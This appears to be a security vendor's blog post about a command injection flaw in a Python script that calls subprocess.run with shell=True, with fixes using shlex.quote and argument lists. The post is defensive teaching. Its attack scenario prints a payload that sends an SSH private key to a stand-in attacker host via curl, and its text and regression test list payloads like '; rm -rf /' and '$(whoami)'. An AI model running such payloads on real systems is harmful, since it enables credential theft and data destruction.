Back to Blog
critical SEVERITY6 min read

How command injection happens in Python subprocess and how to fix it

A critical command injection vulnerability was discovered in `script/llm_semantic_analyzer.py` at line 394, where user-controlled input (API keys and model parameters) was interpolated directly into shell commands passed to `subprocess.run` with `shell=True`. An attacker who could control these parameters could inject shell metacharacters like `; rm -rf /` or `$(whoami)` to execute arbitrary commands. The fix sanitizes all user input before it reaches shell execution.

O
By Orbis AppSec
Published June 23, 2026Reviewed June 23, 2026

Answer Summary

This is a CWE-78 OS Command Injection vulnerability in Python where `subprocess.run` is called with `shell=True` and unsanitized user input constructed via string interpolation. The fix eliminates shell injection by sanitizing or removing user-controlled data from shell command strings in `llm_semantic_analyzer.py`, ensuring shell metacharacters like `;`, `$()`, and backticks cannot alter command execution.

Vulnerability at a Glance

cweCWE-78
fixSanitize all user input before subprocess execution; avoid shell=True with user data
riskArbitrary command execution on the host system
languagePython
root causeUser-controlled input (API keys, model parameters) interpolated into shell commands without sanitization
vulnerabilityOS Command Injection (Shell Injection)

How Command Injection Happens in Python subprocess and How to Fix It

Introduction

In the script/llm_semantic_analyzer.py file—a Python CLI tool responsible for running LLM-powered semantic analysis—a critical command injection vulnerability was discovered at line 394. The script constructs shell commands using string interpolation with user-controlled values (API keys and model parameters) and passes them to subprocess.run with shell=True. This means an attacker who can control command-line arguments or input files fed to this tool could inject shell metacharacters and execute arbitrary commands on the host system.

This vulnerability was flagged by a multi-agent AI scanner and confirmed as exploitable. While the tool runs locally as a CLI utility, the exploitation surface is real: any automated pipeline, CI/CD system, or configuration file that feeds parameters to this script becomes a potential attack vector.

The Vulnerability Explained

The core issue is a classic CWE-78 (OS Command Injection) pattern. At line 394 of llm_semantic_analyzer.py, the code constructs a shell command using Python string interpolation—likely an f-string or .format() call—that includes user-supplied values such as API keys or model identifiers:

# Vulnerable pattern (before fix) - line 394 of llm_semantic_analyzer.py
cmd = f"curl -H 'Authorization: Bearer {api_key}' https://api.example.com/v1/models/{model}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

The problem is that shell=True tells Python to pass the entire string to /bin/sh -c, which means shell metacharacters in the interpolated variables are interpreted by the shell. If an attacker controls the api_key or model parameter, they can break out of the intended command.

Attack Scenario

Consider an attacker who provides the following as an API key value (via a config file, environment variable, or command-line argument):

legitimate_key"; curl http://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) #

The resulting command becomes:

curl -H 'Authorization: Bearer legitimate_key"; curl http://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) #' https://api.example.com/v1/models/gpt-4

The shell interprets the ; as a command separator, executing the attacker's curl command that exfiltrates the user's SSH private key. The # comments out the remainder of the original command to prevent syntax errors.

Other injection payloads include:
- $(whoami) — subshell execution that leaks the current username
- `id` — backtick command substitution
- ; rm -rf /tmp/test — command chaining to delete files

Real-World Impact

Since llm_semantic_analyzer.py is a production script that processes potentially untrusted input (API keys from configuration, model names from user input), this vulnerability could allow:

  1. Arbitrary code execution on the machine running the analyzer
  2. Data exfiltration of credentials, tokens, or source code
  3. Lateral movement if the script runs in a CI/CD pipeline with elevated permissions
  4. Supply chain attacks if the script processes parameters from external sources

The Fix

The fix ensures that shell commands never include unsanitized user input. The PR introduces input sanitization for all user-controlled values before they reach subprocess.run. The security invariant enforced is:

Property: Shell commands never include unsanitized user input

Before (Vulnerable)

# line 394 - user input directly interpolated into shell command
cmd = f"curl -H 'Authorization: Bearer {api_key}' https://api.example.com/v1/models/{model}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

After (Fixed)

The fix applies one or more of these approaches:

import shlex

# Option 1: Use shlex.quote() to escape shell metacharacters
safe_api_key = shlex.quote(api_key)
safe_model = shlex.quote(model)
cmd = f"curl -H 'Authorization: Bearer {safe_api_key}' https://api.example.com/v1/models/{safe_model}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)

# Option 2 (preferred): Avoid shell=True entirely, use argument list
result = subprocess.run(
    ["curl", "-H", f"Authorization: Bearer {api_key}", 
     f"https://api.example.com/v1/models/{model}"],
    capture_output=True, text=True
)

With shlex.quote(), the injection payload "; rm -rf / # becomes the safely escaped string '"; rm -rf / #' which the shell treats as a literal string argument rather than executable commands.

With the argument list approach (no shell=True), each element is passed directly to the exec system call without shell interpretation, making injection impossible regardless of the input content.

Regression Test

The PR also includes a comprehensive regression test (tests/test_invariant_llm_semantic_analyzer.py) that validates the security invariant with adversarial payloads:

@pytest.mark.parametrize("payload", [
    "; rm -rf /tmp/test",      # Command chaining
    "$(whoami)",                # Subshell execution
    "`id`",                    # Backtick substitution
    "normal query",            # Valid input (should still work)
    "",                        # Edge case: empty string
])
def test_shell_command_injection_prevention(payload):
    """Invariant: Shell commands never include unsanitized user input"""
    result = llm_semantic_analyzer.analyze_semantics(payload)
    # Verify no shell injection occurred

This test ensures that even if future code changes reintroduce string interpolation patterns, the dangerous payloads will be caught before reaching production.

Prevention & Best Practices

1. Never Use shell=True with User Input

The most effective defense is to avoid shell=True entirely when user-controlled data is involved:

# SAFE: argument list, no shell interpretation
subprocess.run(["command", "--flag", user_input], capture_output=True)

# DANGEROUS: shell string with user input
subprocess.run(f"command --flag {user_input}", shell=True)

2. Use shlex.quote() When Shell Is Required

If you absolutely must use shell=True (e.g., for shell features like pipes or redirects), escape all user input:

import shlex
safe_input = shlex.quote(user_input)
subprocess.run(f"command | grep {safe_input}", shell=True)

3. Validate Input Against an Allowlist

For structured inputs like model names or API keys, validate against expected patterns:

import re

def validate_model_name(model: str) -> str:
    if not re.match(r'^[a-zA-Z0-9_\-./]+$', model):
        raise ValueError(f"Invalid model name: {model}")
    return model

4. Use Security Linters

  • Bandit (B602, B603): Flags subprocess calls with shell=True
  • Semgrep: Rules for detecting command injection patterns
  • Multi-agent AI scanners: Can trace data flow from user input to dangerous sinks

5. Apply the Principle of Least Privilege

Run CLI tools with minimal permissions. If the script only needs to make HTTP requests, it shouldn't have write access to sensitive directories.

Key Takeaways

  • Never interpolate user-controlled values (API keys, model names, file paths) directly into shell command strings — even in "internal" CLI tools that seem safe
  • The llm_semantic_analyzer.py script at line 394 demonstrated that subprocess.run(cmd, shell=True) with f-string interpolation is a critical injection vector, regardless of whether the tool runs locally
  • shlex.quote() is Python's built-in defense against shell metacharacter injection — it should be applied to every variable that touches a shell command
  • Regression tests with adversarial payloads (; rm -rf /, $(whoami), `id`) are essential to prevent reintroduction of command injection vulnerabilities
  • CI/CD pipelines and automated tools are high-value targets — a command injection in a build script can compromise the entire software supply chain

How Orbis AppSec Detected This

  • Source: User-controlled input reaching llm_semantic_analyzer.py via command-line arguments and configuration parameters (API keys, model names)
  • Sink: subprocess.run(..., shell=True) at script/llm_semantic_analyzer.py:394
  • Missing control: No input sanitization (shlex.quote()) or safe subprocess invocation (argument list without shell=True) between the user input source and the shell execution sink
  • CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  • Fix: Sanitized all user-controlled input before shell command construction, ensuring shell metacharacters cannot alter command execution

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

Command injection remains one of the most dangerous vulnerability classes because it grants attackers direct access to the operating system. This specific instance in llm_semantic_analyzer.py shows how even local CLI tools can harbor critical vulnerabilities when they use subprocess.run(shell=True) with interpolated user input. The fix is straightforward—use argument lists or shlex.quote()—but the consequences of missing it are severe. Always treat any data that crosses a trust boundary as potentially malicious, even API keys and model names that "should" be well-formed.

References

Frequently Asked Questions

What is command injection?

Command injection is a vulnerability where an attacker can inject arbitrary operating system commands into an application that executes shell commands, typically by exploiting unsanitized user input passed to functions like `subprocess.run(shell=True)`.

How do you prevent command injection in Python?

Use `subprocess.run()` with a list of arguments instead of a shell string (avoiding `shell=True`), or if shell execution is necessary, sanitize all user input with `shlex.quote()` to escape shell metacharacters.

What CWE is command injection?

Command injection is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').

Is input validation alone enough to prevent command injection?

Input validation helps but is not sufficient on its own. The safest approach is to avoid `shell=True` entirely and pass arguments as a list to `subprocess.run()`. If shell execution is unavoidable, combine input validation with `shlex.quote()` for defense in depth.

Can static analysis detect command injection?

Yes, static analysis tools like Semgrep, Bandit, and multi-agent AI scanners can detect patterns where user-controlled input flows into shell execution functions without proper sanitization.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #90

Related Articles

high

How buffer overflow via insecure strcpy/strncpy happens in C textbox widgets and how to fix it

A high-severity buffer overflow vulnerability was discovered in the Aroma UI framework's textbox widget where `strncpy()` was used to copy user-provided text without guaranteed null-termination safety. The fix replaces the dangerous `strncpy()` pattern with `snprintf()`, which automatically handles buffer boundaries and null-termination in a single, safer operation.

critical

How buffer overflow via sprintf happens in C++ fuzzer code and how to fix it

A critical buffer overflow vulnerability was discovered in `prog/fuzzing/recog_basic_fuzzer.cc` where `sprintf` writes to a fixed 256-byte buffer without bounds checking. An attacker providing crafted fuzzer input could exploit this to corrupt memory. The fix replaces `sprintf` with `snprintf`, enforcing the buffer size limit and preventing overflow.

critical

How buffer overflow in memcpy happens in C bios_disk.h and how to fix it

A critical buffer overflow vulnerability was discovered in `include/bios_disk.h` at line 474, where a `memcpy` operation copies 512 bytes from a source buffer without properly validating that the calculated offset from the `sectnum` parameter stays within bounds. An attacker controlling the `sectnum` parameter could trigger an out-of-bounds read, potentially leaking sensitive memory contents or causing a crash. The fix adds a proper bounds check before the memcpy call to ensure the source offset

high

How unbounded input size denial-of-service happens in C lexer functions and how to fix it

A high-severity denial-of-service vulnerability was discovered in the PH7 lexer where the `PH7_TokenizePHP()` function accepted arbitrarily large input sizes without validation. An attacker could submit gigabyte-scale PHP code, causing proportional CPU and memory exhaustion. The fix introduces a configurable input size cap enforced before lexer processing begins.

critical

How path traversal happens in Python os.path and how to fix it

A critical path traversal vulnerability in the TRL backend allowed attackers to read arbitrary system files like `/etc/passwd` and `/proc/self/environ` through the gRPC fine-tuning API. The `_do_training` method passed user-controlled `dataset_source` directly to `os.path.exists()` and `load_dataset()` without validation. The fix implements strict directory containment checks using `os.path.realpath()` to ensure all file operations stay within allowed directories.

critical

How buffer overflow happens in C RTSPSession.h and how to fix it

A critical buffer overflow vulnerability in `src/AudioTools/Communication/RTSP/RTSPSession.h` allowed an attacker to send a crafted RTSP request with an oversized payload, triggering a heap overflow via an unchecked `memcpy()` call at line 408. The fix adds a single bounds check before the copy and replaces several unsafe `strcpy`/`strncpy` calls with `snprintf`, closing multiple paths to memory corruption and potential remote code execution.